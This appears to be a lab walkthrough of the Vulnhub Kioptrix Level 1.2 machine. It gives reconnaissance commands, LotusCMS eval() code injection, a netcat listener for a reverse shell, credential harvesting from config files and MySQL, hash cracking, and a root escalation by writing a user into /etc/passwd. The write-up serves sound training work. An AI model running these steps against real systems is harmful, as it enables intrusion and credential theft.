Kioptrix: Level 1.2 (#3) Walkthrough (Vulnhub)

Ahmed Belhadjadji
5 min readAug 21, 2023


This VM is part of the TJ_Null list to prepare for the OSCP, you can download it here.

Nb: A good way of learning is to solve these problems your self and see how did others solve them

Start by downloading the VM and make sure it is under the same network as your kali machine and let’s get started!


looking for the IP address


looking for open ports (without details)

nmap -T4 -p-

performing OS detection, version detection, script scanning on open ports only

nmap -p22,80 -A


let’s start with http (because ssh version is recent, we will leave it in case of credential exposure)

nikto -h

Ps: don’t forget to note your findings

next, we need to fuzz for files and directories

export URL=
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt - hc 404 $URL
export URL= # add a / 
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt - hc 404 $URL

next, let’s try manual discovery/fuzzing

add to the /etc/hosts file

Note that loneferret is a possible username

we found some services

let’s look for any vulnerabilities in searchsploit

searchsploit phpmyadmin
searchsploit lotuscms

Since OSCP exam allows only one time usage of Metasploit, we need to understand the vulnerability and exploit it manually


downloading the payload

searchsploit -m php/remote/18565.rb

Let’s try to understand what the payload is consist of

it looks like the problem relies in the page parameter, in eval() function in particular

we want to test some HTML special chars like -‘ “ # ) ( , ; in the URL

lets try the single quote “ ‘ ” in the url

the request generated an error which is a good sign!!!

notice that the web root directory is /home/www/

we need to take a visit at the eval() function (here), and at HTML special characters (here)

Now, let’s interrupt the request with burp and send it to the repeater, and try different combinations

after trying many options, this code got executed

> > > Code Execution !!!

Let’s verify with php system() function

let’s open a netcat listenner

nc -nvlp 8888

send this reverse shell command as a POST request using burp

> > > We have a shell !!!

Post Exp:

use S1ren’s Breakout code to gain a stable shell and valid tty

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht - color=auto'
# Keyboard Shortcut: Ctrl + Z (Background Process.)
stty raw -echo ; fg ; reset
stty columns 200 rows 200

Let’s gather more information

looking for locally available services

netstat -tulpn

looking for system users

cat /etc/passwd

search the web root directory /home/www/ for any creds

grep -Ri "mysql" /home/www/ | grep -E "username|password" - color=auto

We have found mysql credentials

let’s login

mysql -uroot -pfuckeyou
show databases;
use mysql;
show tables;
select * from user;

localhost | root | *47FB3B1E573D80F44CD198DC65DE7764795F948E

Let’s try another DataBase

use gallery; 
show tables;
select * from dev_accounts;

try to crack them

dreg | 0d3eccfb887aabd50f243b3f155c0f85: Mast3r
loneferret | 5badcaf789d3d1d09794d8f021f40f0e: starwars

now the obvious thing is to login using one the users, and list what sudo commands are allowed

su loneferret
sudo -l

> > >We have a root access to a text editor !!!

Go to kali and create a passwd using openSSL

openssl passwd -1

create a user line in passwd format

USER:PASSWD:UID:GID:USER:/home/USER:/bin/bash (SID:GID = 0:0 for root privileges)

copy it to /etc/passwd, save and quit

now switch user

> > > You are root !!!

I hope this has been informative, want to give a big thanks to S1ren for all her help



Ahmed Belhadjadji
Ahmed Belhadjadji

Written by Ahmed Belhadjadji

When I learn a new thing I post it here

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